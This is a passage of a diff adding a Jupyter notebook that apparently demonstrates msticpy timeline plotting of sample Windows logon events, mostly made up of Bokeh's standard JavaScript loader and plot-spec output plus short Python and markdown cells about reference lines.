\"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2279\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"55762ef8-9251-477a-93f1-1958b8de760f\" data-root-id=\"2284\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"aee838f0-c236-4028-96e1-5822c0de1ec1\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2295\"}],\"center\":[{\"id\":\"2298\"},{\"id\":\"2302\"}],\"height\":200,\"left\":[{\"id\":\"2299\"},{\"id\":\"2375\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"2360\"},{\"id\":\"2366\"},{\"id\":\"2372\"}],\"title\":{\"id\":\"2285\"},\"toolbar\":{\"id\":\"2309\"},\"width\":900,\"x_range\":{\"id\":\"2287\"},\"x_scale\":{\"id\":\"2291\"},\"y_range\":{\"id\":\"2289\"},\"y_scale\":{\"id\":\"2293\"}},\"id\":\"2284\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TargetLogonId\",\"@TargetLogonId\"]]},\"id\":\"2283\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2364\",\"type\":\"Scatter\"},{\"attributes\":{\"source\":{\"id\":\"2281\"}},\"id\":\"2367\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2396\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2307\",\"type\":\"PanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2359\",\"type\":\"Scatter\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2397\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"2280\"},\"glyph\":{\"id\":\"2358\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2359\"},\"view\":{\"id\":\"2361\"}},\"id\":\"2360\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"2379\"},\"major_label_policy\":{\"id\":\"2377\"},\"ticker\":{\"id\":\"2300\"},\"visible\":false},\"id\":\"2299\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"2305\",\"type\":\"ResetTool\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2392\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2398\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2391\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2383\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2393\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2394\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"2308\"}},\"id\":\"2304\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2399\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2384\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2389\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2395\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2386\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5,5,5,5,5,5,5,5,5,5,5],\"TargetLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"TimeGenerated\":{\"__ndarray__\":\"AHCb8/6EdkIA0CX1/oR2QgBQCfb+hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[11]},\"index\":[1,3,4,6,7,8,9,10,11,12,13],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"2387\"},\"selection_policy\":{\"id\":\"2388\"}},\"id\":\"2282\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"2282\"}},\"id\":\"2373\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":\"Timeline: Logons by logon type\"},\"id\":\"2285\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2370\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"2400\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2358\",\"type\":\"Scatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2365\",\"type\":\"Scatter\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2283\"},{\"id\":\"2303\"},{\"id\":\"2304\"},{\"id\":\"2305\"},{\"id\":\"2306\"},{\"id\":\"2307\"}]},\"id\":\"2309\",\"type\":\"Toolbar\"},{\"attributes\":{\"data_source\":{\"id\":\"2281\"},\"glyph\":{\"id\":\"2364\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2365\"},\"view\":{\"id\":\"2367\"}},\"id\":\"2366\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"2287\",\"type\":\"Range1d\"},{\"attributes\":{\"axis\":{\"id\":\"2299\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2302\",\"type\":\"Grid\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2308\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"end\":2.3333333333333335,\"start\":-0.3333333333333333},\"id\":\"2289\",\"type\":\"Range1d\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"LogonType\":[4,4],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[2]},\"index\":[0,5],\"y_index\":[1,1]},\"selected\":{\"id\":\"2385\"},\"selection_policy\":{\"id\":\"2386\"}},\"id\":\"2281\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"label\":{\"value\":\"4\"},\"renderers\":[{\"id\":\"2366\"}]},\"id\":\"2368\",\"type\":\"LegendItem\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2355\"},\"major_label_policy\":{\"id\":\"2380\"},\"ticker\":{\"id\":\"2296\"}},\"id\":\"2295\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"2300\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"2380\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2387\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2355\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"2385\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"2291\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2388\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"label\":{\"value\":\"3\"},\"renderers\":[{\"id\":\"2360\"}]},\"id\":\"2362\",\"type\":\"LegendItem\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"2374\"},{\"id\":\"2368\"},{\"id\":\"2362\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"2375\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"2306\",\"type\":\"SaveTool\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\"],\"LogonType\":[3],\"TargetLogonId\":[\"0xfb5ee6\"],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[2],\"y_index\":[0]},\"selected\":{\"id\":\"2383\"},\"selection_policy\":{\"id\":\"2384\"}},\"id\":\"2280\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2389\"},{\"id\":\"2390\"},{\"id\":\"2391\"},{\"id\":\"2392\"},{\"id\":\"2393\"},{\"id\":\"2394\"},{\"id\":\"2395\"},{\"id\":\"2396\"},{\"id\":\"2397\"},{\"id\":\"2398\"},{\"id\":\"2399\"},{\"id\":\"2400\"}]},\"id\":\"2296\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"source\":{\"id\":\"2280\"}},\"id\":\"2361\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2371\",\"type\":\"Scatter\"},{\"attributes\":{\"data_source\":{\"id\":\"2282\"},\"glyph\":{\"id\":\"2370\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2371\"},\"view\":{\"id\":\"2373\"}},\"id\":\"2372\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2293\",\"type\":\"LinearScale\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2303\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"axis\":{\"id\":\"2295\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2298\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2377\",\"type\":\"AllLabels\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2390\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2379\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"label\":{\"value\":\"5\"},\"renderers\":[{\"id\":\"2372\"}]},\"id\":\"2374\",\"type\":\"LegendItem\"}],\"root_ids\":[\"2284\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"aee838f0-c236-4028-96e1-5822c0de1ec1\",\"root_ids\":[\"2284\"],\"roots\":{\"2284\":\"55762ef8-9251-477a-93f1-1958b8de760f\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2284"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "host_logons = pd.read_csv(\r\n",
+    "    \"data/host_logons.csv\",\r\n",
+    "    parse_dates=[\"TimeGenerated\"],\r\n",
+    "    infer_datetime_format=True,\r\n",
+    "    index_col=0,\r\n",
+    ")\r\n",
+    "\r\n",
+    "host_logons.mp_timeline.plot(\r\n",
+    "    title=\"Logons by Account name\",\r\n",
+    "    group_by=\"Account\",\r\n",
+    "    source_columns=[\"Account\", \"TargetLogonId\", \"LogonType\"],\r\n",
+    "    legend=\"left\",\r\n",
+    "    height=200,\r\n",
+    ")\r\n",
+    "\r\n",
+    "host_logons.mp_timeline.plot(\r\n",
+    "    title=\"Logons by logon type\",\r\n",
+    "    group_by=\"LogonType\",\r\n",
+    "    source_columns=[\"Account\", \"TargetLogonId\", \"LogonType\"],\r\n",
+    "    legend=\"left\",\r\n",
+    "    height=200,\r\n",
+    "    range_tool=False,\r\n",
+    "    ygrid=True,\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Displaying Reference lines\r\n",
+    "\r\n",
+    "You can annotate your timeline with one or more reference markers.\r\n",
+    "These can be supplied as timestamped events in a DataFrame or a list\r\n",
+    "of datetime/label pairs.\r\n",
+    "\r\n",
+    "To use a DataFrame, pass this as the `ref_events`:\r\n",
+    "\r\n",
+    "- You can specify the column to use as a label with the `ref_col` parameter\r\n",
+    "- If the time_column is not the same name as the time column in the main\r\n",
+    "  DataFrame, specify this as `ref_time_col`\r\n",
+    "\r\n",
+    "To use a list of times, use the `ref_times` parameter. This should be a list of tuples of\r\n",
+    "\r\n",
+    "- datetime\r\n",
+    "- label (string)\r\n",
+    "\r\n",
+    "E.g. `ref_times=[(date1, \"item1\"), (date2, \"item2\")...]`\r\n",
+    "\r\n",
+    "You can use either `ref_events` or `ref_times` with a single row or list entry."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.429665Z",
+     "start_time": "2020-01-30T20:46:29.332696Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2526\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2526\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2526\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
